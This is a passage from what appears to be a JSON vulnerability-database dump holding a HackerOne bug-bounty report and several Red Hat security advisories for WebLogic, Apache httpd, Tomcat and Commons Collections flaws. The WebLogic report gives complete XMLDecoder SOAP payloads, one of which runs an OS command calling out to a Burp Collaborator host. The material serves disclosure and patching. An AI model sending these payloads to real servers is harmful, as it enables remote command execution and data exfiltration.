responsible for any misuse of the information contained herein and accepts no responsibility\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\nor exploits by the author or elsewhere. All content (c).\n\nhyp3rlinx", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2023-10-14T03:16:15", "bounty": 0.0, "description": "##Description\nHello. I was able to identify 3 more RCE vulnerabilities due to the outdated Oracle Weblogic instance on the \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, \u2588\u2588\u2588, \u2588\u2588\u2588\u2588\u2588\nAfter my previous discoveries I decided to dig deeper into the `\u2588\u2588\u2588.mil` scope/IP space and found other instances of vulnerable Oracle WebLogic. I decided to fill all this additional findings in the single report\n\n##POC\nThis request to the https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/wls-wsat/CoordinatorPortType will trigger sleep for 10 seconds (same applies for \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, \u2588\u2588\u2588\u2588\u2588\u2588\u2588):\n\n```\nPOST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nContent-Length: 423\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>10000</long>\n </object>\n </java> \n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\n\nThe next request will resolve custom Burp Collaborator hostname via `nslookup` OS command to prove that it's possible to exfiltrate data via DNS:\n```\nPOST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: \u2588\u2588\u2588\nContent-Length: 724\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n\t<soapenv:Header>\n\t\t<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n\t\t\t<java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n\t\t\t<void class=\"java.lang.ProcessBuilder\"> \n\t\t\t\t<array class=\"java.lang.String\" length=\"3\">\n\t\t\t\t<void index = \"0\">\n\t\t\t\t\t<string>cmd</string>\n\t\t\t\t</void>\n\t\t\t\t<void index = \"1\"> \n\t\t\t\t\t<string>/c</string> \n\t\t\t\t</void>\n\t\t\t\t<void index = \"2\">\n\t\t\t\t\t<string>nslookup j3nxpi8ecz9uznkpu32mb7pj9af13q.burpcollaborator.net</string>\n\t\t\t\t</void>\n\t\t\t</array>\n\t\t\t<void method=\"start\"/>\n\t\t\t</void>\n\t\t\t</java>\n\t\t\t</work:WorkContext> \n\t</soapenv:Header> \n<soapenv:Body/>\n</soapenv:Envelope>\n```\n\n\nNote: to reproduce the second case with `nslookup`, `j3nxpi8ecz9uznkpu32mb7pj9af13q.burpcollaborator.net` host should be replaced by your own Burp Collaborator instance to catch the DNS request\n\n##Suggested fix\nPatching WebLogic to the resent version will fix the issue.\n\n## Impact\n\nRemote OS command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 9.9, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.3}, "published": "2019-07-03T19:21:18", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote OS command Execution in the 3 more Oracle Weblogic on the \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, \u2588\u2588\u2588\u2588, \u2588\u2588\u2588\u2588\u2588\u2588\u2588 [CVE-2017-10352]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10352"], "modified": "2019-10-08T18:38:21", "id": "H1:634630", "href": "https://hackerone.com/reports/634630", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-17T07:45:27", "bounty": 100.0, "description": "Bug has been disclosed here:\nhttps://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html\n\npoc code:\nhttps://github.com/hannob/optionsbleed\n\nApache is currently preparing 2.4.28, which will contain the fix, a patch is available in their svn repo.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-09-19T18:04:00", "type": "hackerone", "title": "Internet Bug Bounty: Optionsbleed / CVE-2017-9798", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2018-05-03T14:45:58", "id": "H1:269568", "href": "https://hackerone.com/reports/269568", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2023-11-29T10:41:39", "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nThis release provides an update to httpd, OpenSSL and Tomcat 6/7 for Red Hat JBoss Web Server 2.1.2. The updates are documented in the Release Notes document linked to in the References.\n\nThis release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves as a update for Red Hat JBoss Web Server 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nUsers of Red Hat JBoss Web Server 2 should upgrade to these updated packages, which resolve several security issues.\n\nSecurity Fix(es):\n\n* It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12615)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12617)\n\n* A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank OpenVPN for reporting CVE-2016-2183 and Hanno B\u00f6ck for reporting CVE-2017-9798. Upstream acknowledges Karthikeyan Bhargavan (Inria) and Ga\u00ebtan Leurent (Inria) as the original reporters of CVE-2016-2183.\n\nBug Fix(es):\n\n* Corruption in nodestatsmem in multiple core dumps but in different functions of each core dump. (BZ#1338640)\n\n* mod_cluster segfaults in process_info() due to wrongly generated assembler instruction movslq (BZ#1448709)\n\n* CRL checking of very large CRLs fails with OpenSSL 1.0.2 (BZ#1493075)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.2}, "published": "2017-11-02T19:03:10", "type": "redhat", "title": "(RHSA-2017:3113) Important: Red Hat JBoss Web Server security and bug fix update", "bulletinFamily": "unix", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2183", "CVE-2017-12615", "CVE-2017-12617", "CVE-2017-9788", "CVE-2017-9798"], "modified": "2018-06-06T22:42:48", "id": "RHSA-2017:3113", "href": "https://access.redhat.com/errata/RHSA-2017:3113", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:52:11", "description": "The Jakarta/Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n\"org.apache.commons.collections.enableUnsafeSerialization\" to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-30T00:00:00", "type": "redhat", "title": "(RHSA-2015:2521) Important: jakarta-commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-06-06T16:24:27", "id": "RHSA-2015:2521", "href": "https://access.redhat.com/errata/RHSA-2015:2521", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Fuse Service Works 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-25T20:37:31", "type": "redhat", "title": "(RHSA-2015:2517) Critical: Red Hat Fuse Service Works 6.0.0 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:24:41", "id": "RHSA-2015:2517", "href": "https://access.redhat.com/errata/RHSA-2015:2517", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "JBoss Operations Network provides an integrated solution for managing\nJBoss middleware, other network infrastructure, and applications built\non Red Hat Enterprise Application Platform (EAP). The Apache Commons\nCollections library provides new interfaces, implementations, and\nutilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of JBoss Operations Network 3.1.2 as provided from the Red Hat\nCustomer Portal are advised to apply this update. This patch supersedes\nthe 3.2.1 Hotfix 10.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-01-14T18:31:06", "type": "redhat", "title": "(RHSA-2016:0040) Critical: Red Hat JBoss Operations Network 3.1.2 Hotfix 11 update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:24:41", "id": "RHSA-2016:0040", "href": "https://access.redhat.com/errata/RHSA-2016:0040", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of JBoss Operations Network 3.3.4 as provided from the Red Hat\nCustomer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-30T16:04:46", "type": "redhat", "title": "(RHSA-2015:2524) Critical: Red Hat JBoss Operations Network 3.3.4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:23:29", "id": "RHSA-2015:2524", "href": "https://access.redhat.com/errata/RHSA-2015:2524", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "The Jakarta/Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n\"org.apache.commons.collections.enableUnsafeSerialization\" to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-21T00:00:00", "type": "redhat", "title": "(RHSA-2015:2671) Important: jakarta-commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2017-09-08T08:07:29", "id": "RHSA-2015:2671", "href": "https://access.redhat.com/errata/RHSA-2015:2671", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.4 on Red Hat\nEnterprise Linux 5, 6, and 7 are advised to upgrade to these updated\npackages. The JBoss server process must be restarted for the update to\ntake effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-20T00:00:00", "type": "redhat", "title": "(RHSA-2015:2500) Critical: Red Hat JBoss Enterprise Application Platform 6.4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-06-06T22:39:08", "id": "RHSA-2015:2500", "href": "https://access.redhat.com/errata/RHSA-2015:2500", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-29T10:41:39", "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nThis release provides an update to httpd, OpenSSL and Tomcat 6/7 for Red Hat JBoss Web Server 2. The updates are documented in the Release Notes document linked to in the References.\n\nThis release of Red Hat JBoss Web Server 2.1.2 Service Pack 2 serves as a update for Red Hat JBoss Web Server 2, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nUsers of Red Hat JBoss Web Server 2 should upgrade to these updated packages, which resolve several security issues\n\nSecurity Fix(es):\n\n* It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12615)\n\n* A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12617)\n\n* A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank OpenVPN for reporting CVE-2016-2183 and Hanno B\u00f6ck for reporting CVE-2017-9798. Upstream acknowledges Karthikeyan Bhargavan (Inria) and Ga\u00ebtan Leurent (Inria) as the original reporters of CVE-2016-2183.\n\nBug Fix(es):\n\n* Corruption in nodestatsmem in multiple core dumps but in different functions of each core dump. (BZ#1338640)\n\n* mod_cluster segfaults in process_info() due to wrongly generated assembler instruction movslq (BZ#1448709)\n\n* CRL checking of very large CRLs fails with OpenSSL 1.0.2 (BZ#1493075)\n\n* The jboss-ews-application-servers zip README contains incomplete description of fixed CVEs (BZ#1497953)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.2}, "published": "2017-11-02T19:03:45", "type": "redhat", "title": "(RHSA-2017:3114) Important: Red Hat JBoss Web Server security and bug fix update", "bulletinFamily": "unix", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2183", "CVE-2017-12615", "CVE-2017-12617", "CVE-2017-9788", "CVE-2017-9798"], "modified": "2017-11-02T19:04:09", "id": "RHSA-2017:3114", "href": "https://access.redhat.com/errata/RHSA-2017:3114", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Enterprise Application Platform is a platform for Java\napplications based on JBoss Application Server.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 5.2, 5.1.2, and\n4.3.10 are advised to upgrade to these updated packages. The JBoss server\nprocess must be restarted for the update to take effect.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-24T18:01:11", "type": "redhat", "title": "(RHSA-2015:2514) Critical: Red Hat JBoss Enterprise Application Platform security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2017-12-18T21:00:47", "id": "RHSA-2015:2514", "href": "https://access.redhat.com/errata/RHSA-2015:2514", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T15:52:11", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.1, 6.2, 6.3,\nand 6.4 are advised to upgrade to these updated packages.\n\nThe JBoss server process must be restarted for the update to take effect.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 